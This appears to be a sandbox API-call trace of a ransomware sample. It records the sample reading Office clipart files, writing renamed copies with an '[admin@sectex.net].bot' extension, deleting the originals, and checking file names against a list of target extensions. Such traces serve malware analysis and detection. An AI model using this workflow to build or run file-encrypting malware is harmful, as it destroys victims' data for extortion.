	[0141.402] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.402] lstrlenW (lpString="BL00148_.WMF") returned 12
	[0141.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.438] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1696) returned 1
	[0141.438] CloseHandle (hObject=0x3a8) returned 1
	[0141.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf")) returned 0x20
	[0141.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.438] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.438] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.486] GetLastError () returned 0x0
	[0141.486] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x6a0, lpOverlapped=0x0) returned 1
	[0141.487] WriteFile (in: hFile=0x31c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x6b0, lpOverlapped=0x0) returned 1
	[0141.488] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.488] WriteFile (in: hFile=0x31c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.489] SetEndOfFile (hFile=0x31c) returned 1
	[0141.489] CloseHandle (hObject=0x31c) returned 1
	[0141.489] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.489] SetEndOfFile (hFile=0x3a8) returned 1
	[0141.491] CloseHandle (hObject=0x3a8) returned 1
	[0141.491] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.562] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf")) returned 1
	[0141.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.564] lstrlenW (lpString=".doc") returned 4
	[0141.564] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.564] lstrlenW (lpString=".docx") returned 5
	[0141.564] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.564] lstrlenW (lpString=".pdf") returned 4
	[0141.564] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.564] lstrlenW (lpString=".xls") returned 4
	[0141.564] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.564] lstrlenW (lpString=".xlsx") returned 5
	[0141.564] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.564] lstrlenW (lpString=".ppt") returned 4
	[0141.564] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.564] lstrlenW (lpString=".zip") returned 4
	[0141.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.565] lstrlenW (lpString=".rar") returned 4
	[0141.565] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.565] lstrlenW (lpString=".bz2") returned 4
	[0141.565] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.565] lstrlenW (lpString=".7z") returned 3
	[0141.565] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.565] lstrlenW (lpString=".dbf") returned 4
	[0141.565] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.565] lstrlenW (lpString=".1cd") returned 4
	[0141.565] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.565] lstrlenW (lpString=".jpg") returned 4
	[0141.565] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.565] lstrlenW (lpString=".doc") returned 4
	[0141.565] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.565] lstrlenW (lpString=".docx") returned 5
	[0141.565] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.565] lstrlenW (lpString=".pdf") returned 4
	[0141.565] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.565] lstrlenW (lpString=".xls") returned 4
	[0141.565] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.565] lstrlenW (lpString=".xlsx") returned 5
	[0141.565] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.565] lstrlenW (lpString=".ppt") returned 4
	[0141.565] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.565] lstrlenW (lpString=".zip") returned 4
	[0141.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.565] lstrlenW (lpString=".rar") returned 4
	[0141.566] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.566] lstrlenW (lpString=".bz2") returned 4
	[0141.566] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.566] lstrlenW (lpString=".7z") returned 3
	[0141.566] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.566] lstrlenW (lpString=".dbf") returned 4
	[0141.566] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.566] lstrlenW (lpString=".1cd") returned 4
	[0141.566] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63
	[0141.566] lstrlenW (lpString=".jpg") returned 4
	[0141.566] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.566] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.566] lstrlenW (lpString="BL00247_.WMF") returned 12
	[0141.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.566] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=14444) returned 1
	[0141.567] CloseHandle (hObject=0x3b4) returned 1
	[0141.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf")) returned 0x20
	[0141.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.567] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.567] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0141.568] GetLastError () returned 0x0
	[0141.568] ReadFile (in: hFile=0x3b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x386c, lpOverlapped=0x0) returned 1
	[0141.579] WriteFile (in: hFile=0x3c8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3870, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3870, lpOverlapped=0x0) returned 1
	[0141.580] ReadFile (in: hFile=0x3b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.580] WriteFile (in: hFile=0x3c8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.580] SetEndOfFile (hFile=0x3c8) returned 1
	[0141.580] CloseHandle (hObject=0x3c8) returned 1
	[0141.580] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.580] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.585] CloseHandle (hObject=0x3b4) returned 1
	[0141.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.588] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf")) returned 1
	[0141.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.589] lstrlenW (lpString=".doc") returned 4
	[0141.589] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.589] lstrlenW (lpString=".docx") returned 5
	[0141.589] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.589] lstrlenW (lpString=".pdf") returned 4
	[0141.589] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.589] lstrlenW (lpString=".xls") returned 4
	[0141.589] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.589] lstrlenW (lpString=".xlsx") returned 5
	[0141.589] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.589] lstrlenW (lpString=".ppt") returned 4
	[0141.589] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.589] lstrlenW (lpString=".zip") returned 4
	[0141.589] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.589] lstrlenW (lpString=".rar") returned 4
	[0141.589] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.589] lstrlenW (lpString=".bz2") returned 4
	[0141.589] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.589] lstrlenW (lpString=".7z") returned 3
	[0141.589] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.590] lstrlenW (lpString=".dbf") returned 4
	[0141.590] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.590] lstrlenW (lpString=".1cd") returned 4
	[0141.590] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.590] lstrlenW (lpString=".jpg") returned 4
	[0141.590] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.590] lstrlenW (lpString=".doc") returned 4
	[0141.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.590] lstrlenW (lpString=".docx") returned 5
	[0141.590] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.590] lstrlenW (lpString=".pdf") returned 4
	[0141.590] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.590] lstrlenW (lpString=".xls") returned 4
	[0141.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.590] lstrlenW (lpString=".xlsx") returned 5
	[0141.590] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.590] lstrlenW (lpString=".ppt") returned 4
	[0141.590] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.590] lstrlenW (lpString=".zip") returned 4
	[0141.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.590] lstrlenW (lpString=".rar") returned 4
	[0141.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.590] lstrlenW (lpString=".bz2") returned 4
	[0141.590] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.590] lstrlenW (lpString=".7z") returned 3
	[0141.590] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.590] lstrlenW (lpString=".dbf") returned 4
	[0141.590] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.591] lstrlenW (lpString=".1cd") returned 4
	[0141.591] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63
	[0141.591] lstrlenW (lpString=".jpg") returned 4
	[0141.591] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.591] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.591] lstrlenW (lpString="BL00252_.WMF") returned 12
	[0141.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0141.591] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4708) returned 1
	[0141.591] CloseHandle (hObject=0x3cc) returned 1
	[0141.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf")) returned 0x20
	[0141.592] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0141.592] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.592] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0141.592] GetLastError () returned 0x0
	[0141.592] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1264, lpOverlapped=0x0) returned 1
	[0141.594] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1270, lpOverlapped=0x0) returned 1
	[0141.595] ReadFile (in: hFile=0x3cc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.595] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.595] SetEndOfFile (hFile=0x3d0) returned 1
	[0141.598] CloseHandle (hObject=0x3d0) returned 1
	[0141.598] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.599] SetEndOfFile (hFile=0x3cc) returned 1
	[0141.600] CloseHandle (hObject=0x3cc) returned 1
	[0141.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf")) returned 1
	[0141.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.601] lstrlenW (lpString=".doc") returned 4
	[0141.601] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.601] lstrlenW (lpString=".docx") returned 5
	[0141.601] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.601] lstrlenW (lpString=".pdf") returned 4
	[0141.601] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.602] lstrlenW (lpString=".xls") returned 4
	[0141.602] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.602] lstrlenW (lpString=".xlsx") returned 5
	[0141.602] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.602] lstrlenW (lpString=".ppt") returned 4
	[0141.602] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.602] lstrlenW (lpString=".zip") returned 4
	[0141.602] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.602] lstrlenW (lpString=".rar") returned 4
	[0141.602] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.602] lstrlenW (lpString=".bz2") returned 4
	[0141.602] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.602] lstrlenW (lpString=".7z") returned 3
	[0141.602] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.602] lstrlenW (lpString=".dbf") returned 4
	[0141.602] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.602] lstrlenW (lpString=".1cd") returned 4
	[0141.602] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.602] lstrlenW (lpString=".jpg") returned 4
	[0141.602] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.602] lstrlenW (lpString=".doc") returned 4
	[0141.602] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.602] lstrlenW (lpString=".docx") returned 5
	[0141.602] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.602] lstrlenW (lpString=".pdf") returned 4
	[0141.602] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.602] lstrlenW (lpString=".xls") returned 4
	[0141.602] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.603] lstrlenW (lpString=".xlsx") returned 5
	[0141.603] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.603] lstrlenW (lpString=".ppt") returned 4
	[0141.603] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.603] lstrlenW (lpString=".zip") returned 4
	[0141.603] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.603] lstrlenW (lpString=".rar") returned 4
	[0141.603] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.603] lstrlenW (lpString=".bz2") returned 4
	[0141.603] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.603] lstrlenW (lpString=".7z") returned 3
	[0141.603] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.603] lstrlenW (lpString=".dbf") returned 4
	[0141.603] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.603] lstrlenW (lpString=".1cd") returned 4
	[0141.603] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63
	[0141.603] lstrlenW (lpString=".jpg") returned 4
	[0141.603] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.603] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.603] lstrlenW (lpString="BL00254_.WMF") returned 12
